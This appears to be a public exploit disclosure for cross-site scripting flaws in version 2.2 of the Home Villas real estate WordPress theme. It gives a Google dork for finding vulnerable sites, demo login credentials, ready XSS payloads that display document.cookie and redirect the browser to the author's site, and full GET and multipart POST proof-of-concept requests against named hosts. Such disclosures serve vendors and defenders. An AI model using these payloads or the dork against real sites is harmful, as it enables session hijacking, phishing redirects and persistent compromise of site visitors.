[+] Exploit Title: Home Villas | Real Estate WordPress Theme v2.2 - Multiple Vulnerabilities [+] Google Dork: inurl:/wp-content/themes/homevillas-real-estate/ [+] Date: 2020-07-24 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Chimp Studio [ https://chimpgroup.com ] [+] Software Version: 2.2 [+] Software Link: https://themeforest.net/item/home-villa-real-estate-wordpress-theme/19446059 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities was discovered in the Home Villas theme through 2.2 for WordPress. [i] Demo account @ houseplanng.com: pocuser / 1rNeg6x7fEDp (login / password) [i] PoC property URL: https://houseplanng.com/properties/1-4/ [i] PoC Member Profile URL: https://houseplanng.com/members/poc-user/ ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS -> Vulnerable parameters: property_type, location, search_type, property_category, min-beds, min-bath, min-garage [x] Unauthenticated Reflected XSS in /compare-properties/?type=5684&properties_ids=13[payload],88 [x] Authenticated Persistent XSS on Property page -> «House Plan Summary» text area [x] Authenticated Persistent XSS on Member Profile page -> «Biography» text area ### [ Payloads: ] [$] "><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//"> [$] "><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';> [$] <Input/Autofocus/%0D*/Onfocus=(alert)(`VLΛD\x20VΞCTOR`);window.location=`https://vladvector.ru/`;> ### [ PoC Unauthenticated Reflected XSS with all vulnerable parameters: ] [!] https://homevillas.chimpgroup.com/property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true [!] GET /property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true HTTP/1.1 Host: homevillas.chimpgroup.com ### [ PoC Unauthenticated Reflected XSS in /compare-properties/: ] [!] https://homevillas.chimpgroup.com/compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x [!] GET /compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x HTTP/1.1 Host: homevillas.chimpgroup.com ### [ PoC Authenticated Persistent XSS -> Property page: ] [!] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: houseplanng.com Referer: https://houseplanng.com/ad-new-property/? X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------331731252912908677314128703645 Content-Length: 5012 Origin: https://houseplanng.com Cookie: [cookies_here] -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_gallery_images[0]"; filename="1.jpg" Content-Type: image/png OK -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_type" house-plans -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_new_package_used" on -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_package" 5703 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_phone_number_property" PoC -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_category[parent]" PoC -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_cus_field[bedroom]" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_cus_field[bathroom]" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_cus_field[area]" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_cus_field[storey]" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_cus_field[depth]" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_cus_field[width]" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_title" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_desc" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_summary" "><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';> -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="property_tags[]" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_price_options" price -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_phone_number_property_frontend" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_price" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_price_type" Offers in region of -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_video" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_virtual_tour" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="faq_title" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="faq_desc" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="faq_title" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="faq_desc" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="faq_counter" -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="trans_first_name" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="trans_last_name" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="trans_email" linabo5933@invql.com -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="trans_phone_number" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="trans_address" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_property_gateway" WP_REM_WOOCOMMERCE_GATEWAY -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="wp_rem_buy_order_flag" 1 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="trans_id" 0 -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="term_policy" on -----------------------------331731252912908677314128703645 Content-Disposition: form-data; name="action" user_and_property_meta_save -----------------------------331731252912908677314128703645-- ### [ PoC Authenticated Persistent XSS -> Member Profile page: ] [!] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: houseplanng.com Referer: https://houseplanng.com/dashboard/?dashboard=account Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 455 Origin: https://houseplanng.com Cookie: [cookies_here] member_display_name=PoC+User&member_company_slug=poc-user&wp_rem_biography=%3CInput%2FAutofocus%2F%250D*%2FOnfocus%3D(alert)(%60VL%CE%9BD%5Cx20V%CE%9ECTOR%60)%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%2F%60%3B%3E&member_email=linabo5933%40invql.com&wp_rem_user_phone_number=1337&wp_rem_user_website=&wp_rem_user_facebook=&wp_rem_user_google_plus=&wp_rem_user_twitter=&wp_rem_user_linkedIn=&member_profile_image=&action=wp_rem_member_accounts_save ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector